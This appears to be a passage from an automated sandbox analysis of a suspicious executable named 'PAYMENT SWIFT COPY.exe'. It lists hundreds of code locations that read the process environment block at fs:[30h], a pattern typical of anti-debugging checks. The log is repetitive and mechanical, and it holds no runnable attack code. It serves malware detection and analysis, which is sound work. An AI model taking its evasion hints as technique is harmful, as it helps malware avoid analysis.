                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019961C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019001F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A61E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01990115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197A118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197A118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01900124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01968158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01964144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01964144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D6154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CC156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A4164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019960B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019960B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C80A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019680A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019520DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019120F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D80E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CA0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019560E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CC0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01954000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01972000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01966030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CA020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CC020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01956050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D2050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FC073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CE388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C8397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019743D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197E3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197E3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D83C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198C3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019563C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019063FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018EE3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CC310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F0310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A8324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A8324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01978350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199A352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01952349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01950283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E02A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019662A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019662A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A62D6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E02E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0198A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A250 mov eax, dword ptr fs:[00000030h]8_2_0198A250
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6259 mov eax, dword ptr fs:[00000030h]8_2_018D6259
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01958243 mov eax, dword ptr fs:[00000030h]8_2_01958243
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01958243 mov ecx, dword ptr fs:[00000030h]8_2_01958243
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA250 mov eax, dword ptr fs:[00000030h]8_2_018CA250
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C826B mov eax, dword ptr fs:[00000030h]8_2_018C826B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01980274 mov eax, dword ptr fs:[00000030h]8_2_01980274
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4260 mov eax, dword ptr fs:[00000030h]8_2_018D4260
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E59C mov eax, dword ptr fs:[00000030h]8_2_0190E59C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2582 mov eax, dword ptr fs:[00000030h]8_2_018D2582
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D2582 mov ecx, dword ptr fs:[00000030h]8_2_018D2582
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01904588 mov eax, dword ptr fs:[00000030h]8_2_01904588
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019505A7 mov eax, dword ptr fs:[00000030h]8_2_019505A7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F45B1 mov eax, dword ptr fs:[00000030h]8_2_018F45B1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F45B1 mov eax, dword ptr fs:[00000030h]8_2_018F45B1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A5D0 mov eax, dword ptr fs:[00000030h]8_2_0190A5D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A5D0 mov eax, dword ptr fs:[00000030h]8_2_0190A5D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D65D0 mov eax, dword ptr fs:[00000030h]8_2_018D65D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E5CF mov eax, dword ptr fs:[00000030h]8_2_0190E5CF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E5CF mov eax, dword ptr fs:[00000030h]8_2_0190E5CF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE5E7 mov eax, dword ptr fs:[00000030h]8_2_018FE5E7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D25E0 mov eax, dword ptr fs:[00000030h]8_2_018D25E0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C5ED mov eax, dword ptr fs:[00000030h]8_2_0190C5ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C5ED mov eax, dword ptr fs:[00000030h]8_2_0190C5ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01966500 mov eax, dword ptr fs:[00000030h]8_2_01966500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4500 mov eax, dword ptr fs:[00000030h]8_2_019A4500
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FE53E mov eax, dword ptr fs:[00000030h]8_2_018FE53E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0535 mov eax, dword ptr fs:[00000030h]8_2_018E0535
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8550 mov eax, dword ptr fs:[00000030h]8_2_018D8550
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8550 mov eax, dword ptr fs:[00000030h]8_2_018D8550
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190656A mov eax, dword ptr fs:[00000030h]8_2_0190656A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A49A mov eax, dword ptr fs:[00000030h]8_2_0198A49A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019044B0 mov ecx, dword ptr fs:[00000030h]8_2_019044B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195A4B0 mov eax, dword ptr fs:[00000030h]8_2_0195A4B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D64AB mov eax, dword ptr fs:[00000030h]8_2_018D64AB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D04E5 mov ecx, dword ptr fs:[00000030h]8_2_018D04E5
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908402 mov eax, dword ptr fs:[00000030h]8_2_01908402
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC427 mov eax, dword ptr fs:[00000030h]8_2_018CC427
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CE420 mov eax, dword ptr fs:[00000030h]8_2_018CE420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01956420 mov eax, dword ptr fs:[00000030h]8_2_01956420
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198A456 mov eax, dword ptr fs:[00000030h]8_2_0198A456
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C645D mov eax, dword ptr fs:[00000030h]8_2_018C645D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190E443 mov eax, dword ptr fs:[00000030h]8_2_0190E443
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F245A mov eax, dword ptr fs:[00000030h]8_2_018F245A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195C460 mov ecx, dword ptr fs:[00000030h]8_2_0195C460
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018FA470 mov eax, dword ptr fs:[00000030h]8_2_018FA470
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197678E mov eax, dword ptr fs:[00000030h]8_2_0197678E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D07AF mov eax, dword ptr fs:[00000030h]8_2_018D07AF
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019847A0 mov eax, dword ptr fs:[00000030h]8_2_019847A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018DC7C0 mov eax, dword ptr fs:[00000030h]8_2_018DC7C0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019507C3 mov eax, dword ptr fs:[00000030h]8_2_019507C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018F27ED mov eax, dword ptr fs:[00000030h]8_2_018F27ED
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E7E1 mov eax, dword ptr fs:[00000030h]8_2_0195E7E1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D47FB mov eax, dword ptr fs:[00000030h]8_2_018D47FB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D47FB mov eax, dword ptr fs:[00000030h]8_2_018D47FB
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01900710 mov eax, dword ptr fs:[00000030h]8_2_01900710
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C700 mov eax, dword ptr fs:[00000030h]8_2_0190C700
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0710 mov eax, dword ptr fs:[00000030h]8_2_018D0710
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194C730 mov eax, dword ptr fs:[00000030h]8_2_0194C730
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov eax, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov ecx, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190273C mov eax, dword ptr fs:[00000030h]8_2_0190273C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C720 mov eax, dword ptr fs:[00000030h]8_2_0190C720
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C720 mov eax, dword ptr fs:[00000030h]8_2_0190C720
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01954755 mov eax, dword ptr fs:[00000030h]8_2_01954755
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912750 mov eax, dword ptr fs:[00000030h]8_2_01912750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912750 mov eax, dword ptr fs:[00000030h]8_2_01912750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195E75D mov eax, dword ptr fs:[00000030h]8_2_0195E75D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D0750 mov eax, dword ptr fs:[00000030h]8_2_018D0750
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov esi, dword ptr fs:[00000030h]8_2_0190674D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov eax, dword ptr fs:[00000030h]8_2_0190674D
